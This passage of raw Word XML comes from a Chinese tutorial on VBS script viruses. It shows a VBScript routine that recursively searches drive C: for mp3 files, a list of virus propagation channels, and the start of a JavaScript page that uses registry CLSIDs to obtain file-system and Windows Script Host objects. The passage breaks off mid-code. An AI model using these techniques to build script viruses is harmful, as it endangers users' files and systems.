      </w:r>
      <w:r w:rsidRPr="00175A28">
        <w:t>"，则用户看到的仍然是test.txt，而真正的文件扩展名为</w:t>
      </w:r>
      <w:r w:rsidR="007929C4">
        <w:t>.vbs</w:t>
      </w:r>
      <w:r w:rsidRPr="00175A28">
        <w:t>被隐藏)，</w:t>
      </w:r>
      <w:r w:rsidRPr="00175A28">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户看到的只是文件的图标已经改变。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="0063798A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>文件搜索代码</w:t>
      </w:r>
      <w:r w:rsidRPr="0063798A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>//该函数主要用来寻找满足条件的文件，并生成对应文件的一个病毒副本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="00100611" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sub scan(folder_) </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//scan</w:t>
      </w:r>
      <w:r w:rsidR="0063798A">
        <w:t>函数定义，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">on error resume next </w:t>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//如果出现错误，直接跳过，防止弹出错误窗口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Set fso = Wscript.CreateObject("Scripting.FileSystemObject")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>set folder_=fso.getfolder(folder_)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>set files=folder_.files</w:t>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//当前目录的所有文件集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>for each file in files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ext=fso.GetExtensionName(file) </w:t>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//获取文件后缀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ext=lcase(ext) </w:t>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//后缀名转换成小写字母</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="1260" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">if ext="mp3" then </w:t>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//如果后缀名是mp3，则显示文件路径及文件名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="1260" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Wscript.echo (file)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="1260" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>end if</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>set subfolders=folder_.subfolders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>fo</w:t>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:t xml:space="preserve">r each subfolder in subfolders </w:t>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
        <w:t>//搜索其他目录</w:t>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>递归调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>scan( )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>scan(subfolder)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>end sub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063798A" w:rsidRDefault="0063798A" w:rsidP="0063798A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">scan("C:") </w:t>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//调用scan()搜索整个</w:t>
      </w:r>
      <w:r w:rsidR="00100611">
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>盘，参数也可以是"C:\"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63CC4" w:rsidRDefault="00C63CC4" w:rsidP="00C63CC4">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>vbs</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63CC4">
        <w:t>脚本病毒通过网络传播的方式及代码分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63CC4" w:rsidRDefault="00C63CC4" w:rsidP="00C63CC4">
      <w:r>
        <w:t>VBS病毒之所以传播范围广，主要依赖于的网络传播功能，一般脚本病毒主要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过如下的四种方式进行传播：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63CC4" w:rsidRDefault="00C63CC4" w:rsidP="00C63CC4">
      <w:r w:rsidRPr="00192BFB">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0"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>①</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>E-MAIL附件传播</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63CC4" w:rsidRDefault="00C63CC4" w:rsidP="00C63CC4">
      <w:r w:rsidRPr="00192BFB">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1"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>②</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过局域网传播</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63CC4" w:rsidRDefault="00C63CC4" w:rsidP="00C63CC4">
      <w:r w:rsidRPr="00192BFB">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2"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>③</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过感染</w:t>
      </w:r>
      <w:r>
        <w:t>HTML、ASP、JSP、PHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63CC4" w:rsidRDefault="00C63CC4" w:rsidP="00C63CC4">
      <w:r w:rsidRPr="00192BFB">
        <w:rPr>
          <mc:AlternateContent>
            <mc:Choice Requires="w16se">
              <w:rFonts w:hint="eastAsia"/>
            </mc:Choice>
            <mc:Fallback>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            </mc:Fallback>
          </mc:AlternateContent>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="w16se">
            <w16se:symEx w16se:font="宋体" w16se:char="2463"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>④</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>IRC聊天通道传播</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB43CC" w:rsidRDefault="00EB43CC" w:rsidP="00D840F3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为这里专门</w:t>
      </w:r>
      <w:r w:rsidR="00D840F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>讲脚本的，而且目前最主要的的传播方式还是第三点，所以这里就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>讲解通过感染</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HTML、ASP、JSP、PHP </w:t>
      </w:r>
      <w:r w:rsidR="00D840F3">
        <w:t>这种方式</w:t>
      </w:r>
      <w:r w:rsidR="00D840F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D840F3" w:rsidRDefault="00D840F3" w:rsidP="00D840F3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒之所以能够在</w:t>
      </w:r>
      <w:r>
        <w:t>htm文件中发挥强大功能，采用了和绝大部分网页恶意代码相同的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理。基本上它们采用了相同的代码，不过也可以采用其它代码，这段代码是病毒</w:t>
      </w:r>
      <w:r>
        <w:t>FSO,WSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等对象能够在网页中运行的关键。在</w:t>
      </w:r>
      <w:r>
        <w:t>注册表HKEY_CLASSES_ROOT\CLSID\下可以找到这个主键{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}，注册表中对它他的说明是“Windows Script Host Shell Object”。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D840F3" w:rsidRDefault="00D840F3" w:rsidP="00AC425E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样也可以找到</w:t>
      </w:r>
      <w:r>
        <w:t>{0D43FE01-F093-11CF-8940-00A0C9054228}，注册表对它的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明是“</w:t>
      </w:r>
      <w:r>
        <w:t>FileSystem Object”，一般先要对COM（组件对象模型）进行初始化，在获取相应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件对象之后，病毒便可正确地使用</w:t>
      </w:r>
      <w:r>
        <w:t>FSO、</w:t>
      </w:r>
      <w:r w:rsidR="00092A72">
        <w:t>WSH</w:t>
      </w:r>
      <w:r>
        <w:t>两个对象，调用它们的强大功能。下面就</w:t>
      </w:r>
      <w:r w:rsidR="00092A72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一段完整的病毒，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidR="00092A72">
        <w:t>CLSID</w:t>
      </w:r>
      <w:r>
        <w:t>来调用</w:t>
      </w:r>
      <w:r w:rsidR="00092A72">
        <w:t>FSO</w:t>
      </w:r>
      <w:r>
        <w:t>和WSH的JavaScript代码，如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00FC6FB1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00FC6FB1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00FC6FB1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;title&gt;利用 CLSID 创建实例&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00FC6FB1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;meta http-equiv= "Content-Type" content ="text/html; charset=gb2132"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00FC6FB1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/meta&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00FC6FB1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script language="JavaScript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00C879FC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Doc</w:t>
      </w:r>
      <w:r w:rsidR="00C879FC">
        <w:t>ument.write("&lt;APPLET</w:t>
      </w:r>
      <w:r w:rsidR="00C879FC">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C879FC">
        <w:tab/>
        <w:t>HEIGHT=0</w:t>
      </w:r>
      <w:r w:rsidR="00C879FC">
        <w:tab/>
        <w:t>WIDTH=0</w:t>
      </w:r>
      <w:r>
        <w:t>code=com.ms.activeX.ActiveXComponent&gt;&lt;/APPLET&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00C879FC" w:rsidP="00FC6FB1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00FC6FB1">
        <w:t>Applet可以翻译为小应用程序,Java Applet就是用Java语言编写的这样的一些小应用</w:t>
      </w:r>
      <w:r w:rsidR="00FC6FB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序，它们可以直接嵌入到网页中，并能够产生特殊的效果，在后</w:t>
      </w:r>
      <w:r w:rsidR="00FC6FB1">
        <w:t>面会详细讲解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00FC6FB1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Function creatObj(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00FC6FB1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Try {</w:t>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//t</w:t>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:t>ry….catch</w:t>
      </w:r>
      <w:r>
        <w:t>为异常处理，在后面的</w:t>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:t>JSP</w:t>
      </w:r>
      <w:r>
        <w:t>中会详细讲解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00C879FC">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Obj=document.applets[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00C879FC">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Obj=setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00C879FC">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obj=createInstance(); </w:t>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//创建一个实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00C879FC">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fso=obj.GetObject(); </w:t>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//获取文件系统对象，以便写文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00C879FC">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>tsObj=Fso.OpenTextFile("C:\\testCLSID.txt",2,true);</w:t>
      </w:r>
      <w:r w:rsidR="00C879FC">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C879FC">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//打开C:\\testCLSID.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00C879FC">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>tsObj.Write("Hello FSO")</w:t>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//往文件</w:t>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:t>C:\\testCLSID.txt</w:t>
      </w:r>
      <w:r>
        <w:t>里写入Hello FSO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00C879FC">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>tsObj.close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00C879FC">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>obj.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00C879FC">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">obj.createInstance(); </w:t>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//创建一个实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC6FB1" w:rsidRDefault="00FC6FB1" w:rsidP="00C879FC">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WshShell=obj.GetObject(); </w:t>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001465EE">
